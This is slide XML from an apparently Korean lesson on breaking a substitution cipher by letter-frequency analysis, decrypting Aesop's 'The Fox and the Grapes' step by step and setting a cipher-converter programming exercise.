              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>LGVIWAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>OPIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>ZGW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>EGMZRUU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="90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err="1"/>
              <a:t>MEeLGVIWAMEeOPINeZGWeEGMZRUUePZAIXILGVSIZZMPGKKDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>MEPGROEIWGPCEIPAMDKKEeCIUeMGIFRWCEGLOPINeZHRZMPDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>eWDWOGWITDWeSEDCEEIAFeeWMPIDWeAGTePIKGLMXFPIWCEHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>ZMMEeMEDWOMGQReWCEUXMEDPZMQRGMEEeAPISDWOFICJILeS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>NICeZEeMGGJIPRWIWAIHRUNIWAHRZMUDZZeAMEeFRWCEMRPWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WOPGRWAIOIDWSDMEIGWeMSGMEPeeEeHRUNeARNFRMSDMEWG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>OPeIMePZRCCeZZIOIDWIWAIOIDWEeMPDeAILMePMEeMWUNMDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>UGPZeKFRMIMKIZMEIAMGODTeDMRNIWASIKJeAISIXSDMEEDZWGZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>eDWMEeIDPZIXDWODIUZRPeMEeXIPeZGRPDMDZeIZXMGAeZNDZe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>SEIMXGRCIWWGMOeM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="90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a:t>최빈도를 갖는 문자를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로 변환 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: Y-&gt;e</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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/Theory/T4/Substitution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>치환 암호의 크랙</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>LGVIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>OPINeZGWeEGMZRUUePZAIXILGVSIZZMPGKKDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>MEPGROEIWGPCEIPAMDKKEeCIUeMGIFRWCEGLOPINeZHRZMPDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>eWDWOGWITDWeSEDCEEIAFeeWMPIDWeAGTePIKGLMXFPIWCEHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>ZM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>MEDWOMGQReWCEUXMEDPZMQRGMEEeAPISDWOFICJILeS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>NICeZEeMGGJIPRWIWAIHRUNIWAHRZMUDZZeA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>FRWCEMRPWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WOPGRWAIOIDWSDMEIGWeMSGMEPeeEeHRUNeARNFRMSDMEWG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>OPeIMePZRCCeZZIOIDWIWAIOIDWEeMPDeAILMeP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>MWUNMDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>UGPZeKFRMIMKIZMEIAMGODTeDMRNIWASIKJeAISIXSDMEEDZWGZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>eDW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>IDPZIXDWODIUZRPeMEeXIPeZGRPDMDZeIZXMGAeZNDZe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>SEIMXGRCIWWGMOeM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="90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a:t>최빈도를 갖는 문자를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로 변환</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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err="1"/>
              <a:t>theLGVIWAtheOPINeZGWehGtZRUUePZAIXILGVSIZZtPGKKDWOthPG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>ROhIWGPChIPAtDKKheCIUetGIFRWChGLOPINeZHRZtPDNeWDWOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WITDWeShDChhIAFeeWtPIDWeAGTePIKGLtXFPIWChHRZtthethDWOt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>GQReWChUXthDPZtQRGthheAPISDWOFICJILeSNICeZhetGGJIPRWI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WAIHRUNIWAHRZtUDZZeAtheFRWChtRPWDWOPGRWAIOIDWSDthIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WetSG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thPee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>heHRUNeARNFRtSDthWGOPeItePZRCCeZZIOIDWIWAIOI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>DWhetPDeAILtePthetWUNtDWOUGPZeKFRtItKIZthIAtGODTeDtRNIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>SIKJeAISIXSDthhDZWGZeDWtheIDPZIXDWODIUZRPetheXIPeZGRPDt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>DZeIZXtGAeZNDZeShItXGRCIWWGtOet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="90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a:t>“The” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>점검</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: M-&gt;t, E-&gt;h </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>theLGVIWAtheOrINeZGWehGtZRUUerZAIXILGVSIZZtrGKKDWOthrG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>ROhIWGrChIrAtDKKheCIUetGIFRWChGLOrINeZHRZtrDNeWDWOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WITDWeShDChhIAFeeWtrIDWeAGTerIKGLtXFrIWChHRZtthethDWOt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>GQReWChUXthDrZtQRGthheArISDWOFICJILeSNICeZhetGGJIrRWI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WAIHRUNIWAHRZtUDZZeAtheFRWChtRrWDWOrGRWAIOIDWSDthIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>WetSGthreeheHRUNeARNFRtSDthWGOreIterZRCCeZZIOIDWIWAIOI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>DWhetrDeAILterthetWUNtDWOUGrZeKFRtItKIZthIAtGODTeDtRNIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>SIKJeAISIXSDthhDZWGZeDWtheIDrZIXDWODIUZRretheXIreZGRrDt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>DZeIZXtGAeZNDZeShItXGRCIWWGtOet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="90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a:t>익숙한 단어 추측 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: P -&gt; r</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>thefoxandthegrapesonehotsummersdayafoxwasstrollingthroughanorc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>hardtilhecametoabunchofgrapesjustripeningonavinewhichhadbeentra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> inedoveraloftybranchjustthetoquenchmythirstquothhedrawingbackafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>wpaceshetookarunandajumpandjustmissedthebunchturningroundaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>inwithonetwothreehejumpedupbutwithnogreatersuccessagainandagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> nhetriedafterthetemptingmorselbutatlasthadtogiveitupandwalkedaway withhisnoseintheairsayingiamsuretheyaresouritiseasytodespisewhaty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>oucannotget</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="90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a:t> 해독 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- 『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이솝우화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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196138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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>다음 페이지</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에 맞추어</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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/Theory/T4/Substitution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>치환 암호 변환기</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29257020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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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1.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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이후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>A :     27    </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의 포맷으로</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각</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>크기정렬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" kern="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단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,  “:” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>자로 통일한다</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그 후에 공백은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>개이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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2.  “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&gt;&gt; </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을 출력한 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 입력 받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, input </a:t>
            </a:r>
            <a:r>
